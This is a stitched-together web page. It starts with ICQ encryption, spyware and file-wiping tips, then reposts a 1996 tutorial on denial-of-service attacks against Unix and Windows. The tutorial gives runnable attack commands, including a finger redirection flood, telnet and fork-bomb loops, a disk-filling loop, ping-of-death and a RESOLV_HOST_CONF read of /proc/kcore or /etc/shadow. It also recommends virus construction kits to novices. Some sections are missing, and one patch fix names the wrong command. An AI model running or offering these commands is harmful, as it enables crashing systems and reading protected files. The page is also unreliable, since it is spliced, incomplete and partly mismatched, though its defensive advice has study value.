There are addons which enhance your ICQ with possibility to encrypt outcoming messages. The user on the other side needs to have the addon as well in order to decrypt your message.
Resources:
http://www.encrsoft.com/products/tsm.html
Top Secret Messenger (TSM) - trial version has only weak 8-bit encryption
http://www.planet-express.com/sven/technical/dev/chatbuddy/default.html
Chat Buddy - a freeware Windows application for encrypting chat sessions
http://www.algonet.se/~henisak/icq/encrypt-v5.txt
how encryption works in ICQ protocol v5

[ spyware ]
As we all work hard to become more savvy about protecting our personal information and keeping as anonymous as possible on the web, advertising companies are working just as hard to come up with new ways of getting our personal information. One of the ways they accomplish this is through spyware.
Spyware are applications that are bundled along with many programs that you download for free. Their function is to gather personal information about you and relay it back to advertising firms. The information is then used either to offer you products or sold to other advertisers, so they can promote THEIR products. They claim this is all they do with this information, but the problem is nobody really knows for sure.
Spyware fits the classic definition of a trojan, as it is something that you did not bargain for+when you agreed to download the product. Not only is spyware an invasion of your privacy, but (especially if you have a few different kinds on your machine) it can also chew up bandwidth, making your internet connection slower.
Sometimes, these spies really are harmless, merely connecting back to the home server to deliver+you more advertising. Some, like Gator for instance, send out detailed information about your surfing habits, operating system, income, age demographic et cetera.
Avoiding spyware
Avoiding spyware is getting harder and harder, as more software distributors are choosing it as a method of profiting from freeware and shareware distributions. Be leery of programs with cute+little icons like Gator. Also, watch those Napster wannabes like AudioGalaxy, Limewire, and Kazaa. I've yet to find one that didn't include spyware. Before you download, check to see if the program is known to contain spyware.
For a list of most known spyware, the best I've found is here:
http://www.infoforce.qc.ca/spyware/enknownlistfrm.html
Getting rid of spyware
In most cases, you can remove the spyware from your system and still use the application you downloaded. In the case of Gator and Comet Cursor, the the whole program is spyware an it must be completely removed to stop the spying.
There are several ways to get rid of spyware on your system. You can use a firewall to monitor outgoing connections. The programmers that put these things together, however, are getting sneakier and sneakier about getting them to circumvent firewalls. Comet Cursor, for instance uses an HTTP post command to connect without the intervention of a firewall. You can also install a registry monitor such as Regmon to monitor your registry for unwanted registry registry changes, but this is not foolproof either.
Probably the best method of removal is to download a spyware removal program and run it like it was a virus scanner. The best examples of these programs are:
Lavasoft's Adaware. Available at http://www.lavasoftusa.com/ Or professional cybernut Steve Gibson's OptOut. Available at: http://grc.com/optout.htm Both of these programs are free and are updated regularly.
Here are some links, if you wish to learn more about spyware:
http://www.spychecker.com/
http://grc.com/optout.htm
http://www.thebee.com/bweb/iinfo200.htm

[ cleaning tracks ]
Resources:
Burnt Cookies - allows automatic detection and optional deletion of Cookies deposited by Banner Ad web-sites
http://www.andersson-design.com/bcookies/index.shtml
Surfsecret - automatically kills files like your Internet cache files, cookies, history, temporary files, recent documents, and the contents of the Recycle Bin.
http://www.surfsecret.com/
Note: One sidenote on cleaning tracks. When you delete some files on your machine, these aren't actually deleted. Only the reference to their location in the hard drive is deleted, which makes the OS think that that location on the HD is free and ready to take things. Thus, there are ways to recover data even after you delete them.
There are however, several ways to _wipe_ this information. Programs that fill hard disk locations with zeros, then with 1s, on several passes are your best bet to make sure no document goes to the wrong hands. One of such programs is PGP. PHPi now comes with a utility that does this work, and you can even select the number of passes to wipe files. For *nix, there is also the "wipe" program. Use these when you feel you have data that needs secure cleaning.

An Introduction to Denial of Service

2009-11-03T02:40:00.000-08:00

===================================
=INTRODUCTION TO DENIAL OF SERVICE=
===================================

Hans Husman
t95hhu@student.tdb.uu.se
Last updated: Mon Oct 28 14:56:31 MET 1996

.0. FOREWORD

.A. INTRODUCTION
.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
.A.2.1. INTRODUCTION
.A.2.2. SUB-CULTURAL STATUS
.A.2.3. TO GAIN ACCESS
.A.2.4. REVENGE
.A.2.5. POLITICAL REASONS
.A.2.6. ECONOMICAL REASONS
.A.2.7. NASTINESS
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?

.B. SOME BASIC TARGETS FOR AN ATTACK
.B.1. SWAP SPACE
.B.2. BANDWIDTH
.B.3. KERNEL TABLES
.B.4. RAM
.B.5. DISKS
.B.6. CACHES
.B.7. INETD

.C. ATTACKING FROM THE OUTSIDE
.C.1. TAKING ADVANTAGE OF FINGER
.C.2. UDP AND SUNOS 4.1.3.
.C.3. FREEZING UP X-WINDOWS
.C.4. MALICIOUS USE OF UDP SERVICES
.C.5. ATTACKING WITH LYNX CLIENTS
.C.6. MALICIOUS USE OF telnet
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
.C.8. HOW TO DISABLE ACCOUNTS
.C.9. LINUX AND TCP TIME, DAYTIME
.C.10. HOW TO DISABLE SERVICES
.C.11. PARAGON OS BETA R1.4
.C.12. NOVELLS NETWARE FTP
.C.13. ICMP REDIRECT ATTACKS
.C.14. BROADCAST STORMS
.C.15. EMAIL BOMBING AND SPAMMING
.C.16. TIME AND KERBEROS
.C.17. THE DOT DOT BUG
.C.18. SUNOS KERNEL PANIC
.C.19. HOSTILE APPLETS
.C.20. VIRUS
.C.21. ANONYMOUS FTP ABUSE
.C.22. SYN FLOODING
.C.23. PING FLOODING
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
.C.26. FLEXlm
.C.27. BOOTING WITH TRIVIAL FTP

.D. ATTACKING FROM THE INSIDE
.D.1. KERNEL PANIC UNDER SOLARIS 2.3
.D.2. CRASHING THE X-SERVER
.D.3. FILLING UP THE HARD DISK
.D.4. MALICIOUS USE OF eval
.D.5. MALICIOUS USE OF fork()
.D.6. CREATING FILES THAT IS HARD TO REMOVE
.D.7. DIRECTORY NAME LOOKUPCACHE
.D.8. CSH ATTACK
.D.9. CREATING FILES IN /tmp
.D.10. USING RESOLV_HOST_CONF
.D.11. SUN 4.X AND BACKGROUND JOBS
.D.12. CRASHING DG/UX WITH ULIMIT
.D.13. NETTUNE AND HP-UX
.D.14. SOLARIS 2.X AND NFS
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X

.E. DUMPING CORE
.E.1. SHORT COMMENT
.E.2. MALICIOUS USE OF NETSCAPE
.E.3. CORE DUMPED UNDER WUFTPD
.E.4. ld UNDER SOLARIS/X86

.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?
.F.1. BASIC SECURITY PROTECTION
.F.1.1. INTRODUCTION
.F.1.2. PORT SCANNING
.F.1.3. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.4. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.5. EXTRA SECURITY SYSTEMS
.F.1.6. MONITORING SECURITY
.F.1.7. KEEPING UP TO DATE
.F.1.8. READ SOMETHING BETTER
.F.2. MONITORING PERFORMANCE
.F.2.1. INTRODUCTION
.F.2.2. COMMANDS AND SERVICES
.F.2.3. PROGRAMS
.F.2.4. ACCOUNTING

.G. SUGGESTED READING
.G.1. INFORMATION FOR DEEPER KNOWLEDGE
.G.2. KEEPING UP TO DATE INFORMATION
.G.3. BASIC INFORMATION

.H. COPYRIGHT

.I. DISCLAIMER

.0. FOREWORD
------------

In this paper I have tried to answer the following questions:

- What is a denial of service attack?
- Why would someone crash a system?
- How can someone crash a system.
- How do I protect a system against denial of service attacks?

I also have a section called SUGGESTED READING were you can find
information about good free information that can give you a deeper
understanding about something.

Note that I have a very limited experience with Macintosh, OS/2 and
Windows and most of the material are therefore for Unix use.

You can always find the latest version at the following address:
http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT

Feel free to send comments, tips and so on to address:
t95hhu@student.tdb.uu.se

.A. INTRODUCTION
~~~~~~~~~~~~~~~~

.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
-----------------------------------------

Denial of service is about without permission knocking off
services, for example through crashing the whole system. This
kind of attacks are easy to launch and it is hard to protect
a system against them. The basic problem is that Unix
assumes that users on the system or on other systems will be
well behaved.

.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
---------------------------------------

.A.2.1. INTRODUCTION
--------------------

Why would someone crash a system? I can think of several reasons
that I have presentated more precisely in a section for each reason,
but for short:

.1. Sub-cultural status.
.2. To gain access.
.3. Revenge.
.4. Political reasons.
.5. Economical reasons.
.6. Nastiness.

I think that number one and six are the more common today, but that
number four and five will be the more common ones in the future.

.A.2.2. SUB-CULTURAL STATUS
---------------------------

After all information about syn flooding a bunch of such attacks
were launched around Sweden. The very most of these attacks were
not a part of a IP-spoof attack, it was "only" a denial of service
attack. Why?

I think that hackers attack systems as a sub-cultural pseudo career
and I think that many denial of service attacks, and here in the
example syn flooding, were performed for these reasons. I also think
that many hackers begin their carrer with denial of service attacks.

.A.2.3. TO GAIN ACCESS
----------------------

Sometimes could a denial of service attack be a part of an attack to
gain access at a system. At the moment I can think of these reasons
and specific holes:

.1. Some older X-lock versions could be crashed with a
method from the denial of service family leaving the system
open. Physical access was needed to use the work space after.

.2. Syn flooding could be a part of a IP-spoof attack method.

.3. Some program systems could have holes under the startup,
that could be used to gain root, for example SSH (secure shell).

.4. Under an attack it could be usable to crash other machines
in the network or to deny certain persons the ability to access
the system.

.5. Also could a system being booted sometimes be subverted,
especially rarp-boots. If we know which port the machine listen
to (69 could be a good guess) under the boot we can send false
packets to it and almost totally control the boot.

.A.2.4. REVENGE
---------------

A denial of service attack could be a part of a revenge against a user
or an administrator.

.A.2.5. POLITICAL REASONS
-------------------------

Sooner or later will new or old organizations understand the potential
of destroying computer systems and find tools to do it.

For example imaginate the Bank A loaning company B money to build a
factory threating the environment. The organization C therefor crash A:s
computer system, maybe with help from an employee. The attack could cost
A a great deal of money if the timing is right.

.A.2.6. ECONOMICAL REASONS
--------------------------

Imaginate the small company A moving into a business totally dominated by
company B. A and B customers make the orders by computers and depends
heavily on that the order is done in a specific time (A and B could be
stock trading companies). If A and B can't perform the order the customers
lose money and change company.

As a part of a business strategy A pays a computer expert a sum of money to
get him to crash B:s computer systems a number of times. A year later A
is the dominating company.

.A.2.7. NASTINESS
-----------------

I know a person that found a workstation where the user had forgotten to
logout. He sat down and wrote a program that made a kill -9 -1 at a
random time at least 30 minutes after the login time and placed a call to
the program from the profile file. That is nastiness.

.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?
---------------------------------------------

This is a hard question to answer and I don't think that it will
give anything to compare different Unix platforms. You can't say that
one Unix is more secure against denial of service, it is all up to the
administrator.

A comparison between Windows 95 and NT on one side and Unix on the
other could however be interesting.

Unix systems are much more complex and have hundreds of built in programs,
services... This always open up many ways to crash the system from
the inside.

In the normal Windows NT and 95 network were is few ways to crash
the system. Although were is methods that always will work.

That gives us that no big different between Microsoft and Unix can
be seen regardning the inside attacks. But there is a couple of
points left:

- Unix have much more tools and programs to discover an
attack and monitoring the users. To watch what another user
is up to under windows is very hard.

- The average Unix administrator probably also have much more
experience than the average Microsoft administrator.

The two last points gives that Unix is more secure against inside
denial of service attacks.

A comparison between Microsoft and Unix regarding outside attacks
are much more difficult. However I would like to say that the average
Microsoft system on the Internet are more secure against outside
attacks, because they normally have much less services.

.B. SOME BASIC TARGETS FOR AN ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.B.1. SWAP SPACE
----------------

Most systems have several hundred Mbytes of swap space to
service client requests. The swap space is typical used
for forked child processes which have a short life time.
The swap space will therefore almost never in a normal
cause be used heavily. A denial of service could be based
on a method that tries to fill up the swap space.

.B.2. BANDWIDTH
---------------

If the bandwidth is to high the network will be useless. Most
denial of service attack influence the bandwidth in some way.

.B.3. KERNEL TABLES
-------------------

It is trivial to overflow the kernel tables which will cause
serious problems on the system. Systems with write through
caches and small write buffers is especially sensitive.

Kernel memory allocation is also a target that is sensitive.
The kernel have a kernelmap limit, if the system reach this
limit it can not allocate more kernel memory and must be rebooted.
The kernel memory is not only used for RAM, CPU:s, screens and so
on, it it also used for ordinaries processes. Meaning that any system
can be crashed and with a mean (or in some sense good) algorithm pretty
fast.

For Solaris 2.X it is measured and reported with the sar command
how much kernel memory the system is using, but for SunOS 4.X there
is no such command. Meaning that under SunOS 4.X you don't even can
get a warning. If you do use Solaris you should write sar -k 1 to
get the information. netstat -k can also be used and shows how much
memory the kernel have allocated in the subpaging.

.B.4. RAM
---------

A denial of service attack that allocates a large amount of RAM
can make a great deal of problems. NFS and mail servers are
actually extremely sensitive because they do not need much
RAM and therefore often don't have much RAM. An attack at
a NFS server is trivial. The normal NFS client will do a
great deal of caching, but a NFS client can be anything
including the program you wrote yourself...

.B.5. DISKS
-----------

A classic attack is to fill up the hard disk, but an attack at
the disks can be so much more. For example can an overloaded disk
be misused in many ways.

.B.6. CACHES
-------------

A denial of service attack involving caches can be based on a method
to block the cache or to avoid the cache.

These caches are found on Solaris 2.X:

Directory name lookup cache: Associates the name of a file with a vnode.

Inode cache: Cache information read from disk in case it is needed
again.

Rnode cache: Holds information about the NFS filesystem.

Buffer cache: Cache inode indirect blocks and cylinders to realed disk
I/O.

.B.7. INETD
-----------

Well once inetd crashed all other services running through inetd no
longer will work.

.C. ATTACKING FROM THE OUTSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.C.1. TAKING ADVANTAGE OF FINGER
--------------------------------

Most fingerd installations support redirections to an other host.

Ex:

$finger @system.two.com@system.one.com

finger will in the example go through system.one.com and on to
system.two.com. As far as system.two.com knows it is system.one.com
who is fingering. So this method can be used for hiding, but also
for a very dirty denial of service attack. Lock at this:

$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack

All those @ signs will get finger to finger host.we.attack again and
again and again... The effect on host.we.attack is powerful and
the result is high bandwidth, short free memory and a hard disk with
less free space, due to all child processes (compare with .D.5.).

The solution is to install a fingerd which don't support redirections,
for example GNU finger. You could also turn the finger service off,
but I think that is just a bit to much.

.C.2. UDP AND SUNOS 4.1.3.
--------------------------

SunOS 4.1.3. is known to boot if a packet with incorrect information
in the header is sent to it. This is the cause if the ip_options
indicate a wrong size of the packet.

The solution is to install the proper patch.

.C.3. FREEZING UP X-WINDOWS
---------------------------

If a host accepts a telnet session to the X-Windows port (generally
somewhere between 6000 and 6025. In most cases 6000) could that
be used to freeze up the X-Windows system. This can be made with
multiple telnet connections to the port or with a program which
sends multiple XOpenDisplay() to the port.

The same thing can happen to Motif or Open Windows.

The solution is to deny connections to the X-Windows port.

.C.4. MALICIOUS USE OF UDP SERVICES
-----------------------------------

It is simple to get UDP services (echo, time, daytime, chargen) to
loop, due to trivial IP-spoofing. The effect can be high bandwidth
that causes the network to become useless. In the example the header
claim that the packet came from 127.0.0.1 (loopback) and the target
is the echo port at system.we.attack. As far as system.we.attack knows
is 127.0.0.1 system.we.attack and the loop has been establish.

Ex:

from-IP=127.0.0.1
to-IP=system.we.attack
Packet type:UDP
from UDP port 7
to UDP port 7

Note that the name system.we.attack looks like a DNS-name, but the
target should always be represented by the IP-number.

Quoted from proberts@clark.net (Paul D. Robertson) comment on
comp.security.firewalls on matter of "Introduction to denial of service"

" A great deal of systems don't put loopback on the wire, and simply
emulate it. Therefore, this attack will only effect that machine
in some cases. It's much better to use the address of a different
machine on the same network. Again, the default services should
be disabled in inetd.conf. Other than some hacks for mainframe IP
stacks that don't support ICMP, the echo service isn't used by many
legitimate programs, and TCP echo should be used instead of UDP
where it is necessary. "

.C.5. ATTACKING WITH LYNX CLIENTS
---------------------------------

A World Wide Web server will fork an httpd process as a respond
to a request from a client, typical Netscape or Mosaic. The process
lasts for less than one second and the load will therefore never
show up if someone uses ps. In most causes it is therefore very
safe to launch a denial of service attack that makes use of
multiple W3 clients, typical lynx clients. But note that the netstat
command could be used to detect the attack (thanks to Paul D. Robertson).

Some httpd:s (for example http-gw) will have problems besides the normal
high bandwidth, low memory... And the attack can in those causes get
the server to loop (compare with .C.6.)

.C.6. MALICIOUS USE OF telnet
-----------------------------

Study this little script:

Ex:

while : ; do
telnet system.we.attack &
done

An attack using this script might eat some bandwidth, but it is
nothing compared to the finger method or most other methods. Well
the point is that some pretty common firewalls and httpd:s thinks
that the attack is a loop and turn them self down, until the
administrator sends kill -HUP.

This is a simple high risk vulnerability that should be checked
and if present fixed.

.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
-----------------------------------------------

If the attacker makes a telnet connections to the Solaris 2.4 host and
quits using:

Ex:

Control-}
quit

then will inetd keep going "forever". Well a couple of hundred...

The solution is to install the proper patch.

.C.8. HOW TO DISABLE ACCOUNTS
-----------------------------

Some systems disable an account after N number of bad logins, or waits
N seconds. You can use this feature to lock out specific users from
the system.

.C.9. LINUX AND TCP TIME, DAYTIME
----------------------------------

Inetd under Linux is known to crash if to many SYN packets sends to
daytime (port 13) and/or time (port 37).

The solution is to install the proper patch.

.C.10. HOW TO DISABLE SERVICES
------------------------------

Most Unix systems disable a service after N sessions have been
open in a given time. Well most systems have a reasonable default
(lets say 800 - 1000), but not some SunOS systems that have the
default set to 48...

The solutions is to set the number to something reasonable.

.C.11. PARAGON OS BETA R1.4
---------------------------

If someone redirects an ICMP (Internet Control Message Protocol) packet
to a paragon OS beta R1.4 will the machine freeze up and must be
rebooted. An ICMP redirect tells the system to override routing
tables. Routers use this to tell the host that it is sending
to the wrong router.

The solution is to install the proper patch.

.C.12. NOVELLS NETWARE FTP
--------------------------

Novells Netware FTP server is known to get short of memory if multiple
ftp sessions connects to it.

.C.13. ICMP REDIRECT ATTACKS
----------------------------

Gateways uses ICMP redirect to tell the system to override routing
tables, that is telling the system to take a better way. To be able
to misuse ICMP redirection we must know an existing connection
(well we could make one for ourself, but there is not much use for that).
If we have found a connection we can send a route that
loses it connectivity or we could send false messages to the host
if the connection we have found don't use cryptation.

Ex: (false messages to send)

DESTINATION UNREACHABLE
TIME TO LIVE EXCEEDED
PARAMETER PROBLEM
PACKET TOO BIG

The effect of such messages is a reset of the connection.

The solution could be to turn ICMP redirects off, not much proper use
of the service.

.C.14. BROADCAST STORMS
-----------------------

This is a very popular method in networks there all of the hosts are
acting as gateways.

There are many versions of the attack, but the basic method is to
send a lot of packets to all hosts in the network with a destination
that don't exist. Each host will try to forward each packet so
the packets will bounce around for a long time. And if new packets
keep coming the network will soon be in trouble.

Services that can be misused as tools in this kind of attack is for
example ping, finger and sendmail. But most services can be misused
in some way or another.

.C.15. EMAIL BOMBING AND SPAMMING
---------------------------------

In a email bombing attack the attacker will repeatedly send identical
email messages to an address. The effect on the target is high bandwidth,
a hard disk with less space and so on... Email spamming is about sending
mail to all (or rather many) of the users of a system. The point of
using spamming instead of bombing is that some users will try to
send a replay and if the address is false will the mail bounce back. In
that cause have one mail transformed to three mails. The effect on the
bandwidth is obvious.

There is no way to prevent email bombing or spamming. However have
a look at CERT:s paper "Email bombing and spamming".

.C.16. TIME AND KERBEROS
------------------------

If not the the source and target machine is closely aligned will the
ticket be rejected, that means that if not the protocol that set the
time is protected it will be possible to set a kerberos server of
function.

.C.17. THE DOT DOT BUG
----------------------

Windows NT file sharing system is vulnerable to the under Windows 95
famous dot dot bug (dot dot like ..). Meaning that anyone can crash
the system. If someone sends a "DIR ..\" to the workstation will a
STOP messages appear on the screen on the Windows NT computer. Note that
it applies to version 3.50 and 3.51 for both workstation and server
version.

The solution is to install the proper patch.

.C.18. SUNOS KERNEL PANIC
-------------------------

Some SunOS systems (running TIS?) will get a kernel panic if a
getsockopt() is done after that a connection has been reset.

The solution could be to install Sun patch 100804.

.C.19. HOSTILE APPLETS
----------------------

A hostile applet is any applet that attempts to use your system
in an inappropriate manner. The problems in the java language
could be sorted in two main groups:

1) Problems due to bugs.
2) Problems due to features in the language.

In group one we have for example the java bytecode verifier bug, which
makes is possible for an applet to execute any command that the user
can execute. Meaning that all the attack methods described in .D.X.
could be executed through an applet. The java bytecode verifier bug
was discovered in late March 1996 and no patch have yet been available
(correct me if I'am wrong!!!).

Note that two other bugs could be found in group one, but they
are both fixed in Netscape 2.01 and JDK 1.0.1.

Group two are more interesting and one large problem found is the
fact that java can connect to the ports. Meaning that all the methods
described in .C.X. can be performed by an applet. More information
and examples could be found at address:

http://www.math.gatech.edu/~mladue/HostileArticle.html

If you need a high level of security you should use some sort of
firewall for protection against java. As a user you could have
java disable.

.C.20. VIRUS
------------

Computer virus is written for the purpose of spreading and
destroying systems. Virus is still the most common and famous
denial of service attack method.

It is a misunderstanding that virus writing is hard. If you know
assembly language and have source code for a couple of virus it
is easy. Several automatic toolkits for virus construction could
also be found, for example:

* Genvir.
* VCS (Virus Construction Set).
* VCL (Virus Construction Laboratory).
* PS-MPC (Phalcon/Skism - Mass Produced Code Generator).
* IVP (Instant Virus Production Kit).
* G2 (G Squared).

PS-MPC and VCL is known to be the best and can help the novice programmer
to learn how to write virus.

An automatic tool called MtE could also be found. MtE will transform
virus to a polymorphic virus. The polymorphic engine of MtE is well
known and should easily be catch by any scanner.

.C.21. ANONYMOUS FTP ABUSE
--------------------------

If an anonymous FTP archive have a writable area it could be misused
for a denial of service attack similar with with .D.3. That is we can
fill up the hard disk.

Also can a host get temporarily unusable by massive numbers of
FTP requests.

For more information on how to protect an anonymous FTP site could
CERT:s "Anonymous FTP Abuses" be a good start.

.C.22. SYN FLOODING
-------------------

Both 2600 and Phrack have posted information about the syn flooding attack.
2600 have also posted exploit code for the attack.

As we know the syn packet is used in the 3-way handshake. The syn flooding
attack is based on an incomplete handshake. That is the attacker host
will send a flood of syn packet but will not respond with an ACK packet.
The TCP/IP stack will wait a certain amount of time before dropping
the connection, a syn flooding attack will therefore keep the syn_received
connection queue of the target machine filled.

The syn flooding attack is very hot and it is easy to find more information
about it, for example:

[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
Article by Christopher Klaus, including a "solution".

[.2.] http://jya.com/floodd.txt
2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane

[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
IP-spoofing Demystified by daemon9 / route / infinity
for Phrack Magazine

.C.23. PING FLOODING
--------------------

I haven't tested how big the impact of a ping flooding attack is, but
it might be quite big.

Under Unix we could try something like: ping -s host
to send 64 bytes packets.

If you have Windows 95, click the start button, select RUN, then type
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.

.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
----------------------------------------------------------

If someone can ping your machine from a Windows 95 machine he or she might
reboot or freeze your machine. The attacker simply writes:

ping -l 65510 address.to.the.machine

And the machine will freeze or reboot.

Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).

.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
--------------------------------------------------

The subnet mask reply message is used under the reboot, but some
hosts are known to accept the message any time without any check.
If so all communication to or from the host us turned off, it's dead.

The host should not accept the message any time but under the reboot.

.C.26. FLEXlm
-------------

Any host running FLEXlm can get the FLEXlm license manager daemon
on any network to shutdown using the FLEXlm lmdown command.

# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.

Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#

.C.27. BOOTING WITH TRIVIAL FTP
-------------------------------

To boot diskless workstations one often use trivial ftp with rarp or
bootp. If not protected an attacker can use tftp to boot the host.

.D. ATTACKING FROM THE INSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.D.1. KERNEL PANIC UNDER SOLARIS 2.3
------------------------------------

Solaris 2.3 will get a kernel panic if this
is executed:

EX:

$ndd /dev/udp udp_status

The solution is to install the proper patch.

.D.2. CRASHING THE X-SERVER
---------------------------

If stickybit is not set in /tmp then can the file /tmp/.x11-unix/x0
be removed and the x-server will crash.

Ex:

$ rm /tmp/.x11-unix/x0

.D.3. FILLING UP THE HARD DISK
-----------------------------

If your hard disk space is not limited by a quota or if you can use
/tmp then it`s possible for you to fill up the file system.

Ex:

while : ;
mkdir .xxx
cd .xxx
done

.D.4. MALICIOUS USE OF eval
---------------------------

Some older systems will crash if eval '\!\!' is executed in the
C-shell.

Ex:

% eval '\!\!'

.D.5. MALICIOUS USE OF fork()
-----------------------------

If someone executes this C++ program the result will result in a crash
on most systems.

Ex:

#include
#include
#include

main()
{
int x;
while(x=0;x<1000000;x++)
{
system("uptime");
fork();
}
}

You can use any command you want, but uptime is nice
because it shows the workload.

To get a bigger and very ugly attack you should however replace uptime
(or fork them both) with sync. This is very bad.

If you are real mean you could also fork a child process for
every child process and we will get an exponential increase of
workload.

There is no good way to stop this attack and
similar attacks. A solution could be to place a limit
on time of execution and size of processes.

.D.6. CREATING FILES THAT IS HARD TO REMOVE
-------------------------------------------

Well all files can be removed, but here is some ideas:

Ex.I.

$ cat > -xxx
^C
$ ls
-xxx
$ rm -xxx
rm: illegal option -- x
rm: illegal option -- x
rm: illegal option -- x
usage: rm [-fiRr] file ...
$

Ex.II.

$ touch xxx!
$ rm xxx!
rm: remove xxx! (yes/no)? y
$ touch xxxxxxxxx!
$ rm xxxxxxxxx!
bash: !": event not found
$

(You see the size do count!)

Other well know methods is files with odd characters or spaces
in the name.

These methods could be used in combination with ".D.3 FILLING UP THE
HARDDISK". If you do want to remove these files you must use some sort
of script or a graphical interface like OpenWindow:s File
Manager. You can also try to use: rm ./. It should work for
the first example if you have a shell.

.D.7. DIRECTORY NAME LOOKUPCACHE
--------------------------------

Directory name lookupcache (DNLC) is used whenever a file is opened.
DNLC associates the name of the file to a vnode. But DNLC can only
operate on files with names that has less than N characters (for SunOS 4.x
up to 14 character, for Solaris 2.x up 30 characters). This means
that it's dead easy to launch a pretty discreet denial of service attack.

Create lets say 20 directories (for a start) and put 10 empty files in
every directory. Let every name have over 30 characters and execute a
script that makes a lot of ls -al on the directories.

If the impact is not big enough you should create more files or launch
more processes.

.D.8. CSH ATTACK
----------------

Just start this under /bin/csh (after proper modification)
and the load level will get very high (that is 100% of the cpu time)
in a very short time.

Ex:

|I /bin/csh
nodename : **************b

.D.9. CREATING FILES IN /tmp
----------------------------

Many programs creates files in /tmp, but are unable to deal with the problem
if the file already exist. In some cases this could be used for a
denial of service attack.

.D.10. USING RESOLV_HOST_CONF
-----------------------------

Some systems have a little security hole in the way they use the
RESOLV_HOST_CONF variable. That is we can put things in it and
through ping access confidential data like /etc/shadow or
crash the system. Most systems will crash if /proc/kcore is
read in the variable and access through ping.

Ex:

$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf

.D.11. SUN 4.X AND BACKGROUND JOBS
----------------------------------

Thanks to Mr David Honig for the following:

" Put the string "a&" in a file called "a" and perform "chmod +x a".
Running "a" will quickly disable a Sun 4.x machine, even disallowing
(counter to specs) root login as the kernel process table fills."

" The cute thing is the size of the
script, and how few keystrokes it takes to bring down a Sun
as a regular user."

.D.12. CRASHING DG/UX WITH ULIMIT
---------------------------------

ulimit is used to set a limit on the system resources available to the
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the
passwd file be set to zero.

.D.13. NETTUNE AND HP-UX
------------------------

/usr/contrib/bin/nettune is SETUID root on HP-UX meaning
that any user can reset all ICMP, IP and TCP kernel
parameters, for example the following parameters:

- arp_killcomplete
- arp_killincomplete
- arp_unicast
- arp_rebroadcast
- icmp_mask_agent
- ip_defaultttl
- ip_forwarding
- ip_intrqmax
- pmtu_defaulttime
- tcp_localsubnets
- tcp_receive
- tcp_send
- tcp_defaultttl
- tcp_keepstart
- tcp_keepfreq
- tcp_keepstop
- tcp_maxretrans
- tcp_urgent_data_ptr
- udp_cksum
- udp_defaultttl
- udp_newbcastenable
- udp_pmtu
- tcp_pmtu
- tcp_random_seq

The solution could be to set the proper permission on
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.14. SOLARIS 2.X AND NFS
--------------------------

If a process is writing over NFS and the user goes over the disk
quota will the process go into an infinite loop.

.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
--------------------------------------------------

By executing a sequence of mount_union commands any user
can cause a system reload on all FreeBSD version 2.X before
1996-05-18.

$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b

The solution could be to set the proper permission on
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
----------------------------------------------------

Executing the trap_mon instruction from user mode can cause
a kernel panic or a window underflow watchdog reset under
SunOS 4.1.x, sun4c architecture.

.E. DUMPING CORE
~~~~~~~~~~~~~~~~

.E.1. SHORT COMMENT
-------------------

The core dumps things don't really belongs in this paper but I have
put them here anyway.

.E.2. MALICIOUS USE OF NETSCAPE
-------------------------------

Under Netscape 1.1N this link will result in a segmentation fault and a
core dump.

Ex:

.F.1.7. MONITORING SECURITY
---------------------------

Also monitor security regular, for example through examining system log
files, history files... Even in a system without any extra security systems
could several tools be found for monitoring, for example:

- uptime
- showmount
- ps
- netstat
- finger

(see the man text for more information).

.F.1.8. KEEPING UP TO DATE
--------------------------

It is very important to keep up to date with security problems. Also
understand that then, for example CERT, warns for something it has often
been dark-side public for sometime, so don't wait. The following resources
that helps you keeping up to date can for example be found on the Internet:

- CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.

- Bugtraq mailing list. Send an e-mail to bugtraq-request@fc.net.

- WWW-security mailing list. Send an e-mail to
www-security@ns2.rutgers.edu.

.F.1.9. READ SOMETHING BIGGER AND BETTER
----------------------------------------

Let's start with papers on the Internet. I am sorry to say that it is not
very many good free papers that can be found, but here is a small collection
and I am sorry if have have over looked a paper.

(1) The Rainbow books is a long series of free books on computer security.
US citizens can get the books from:

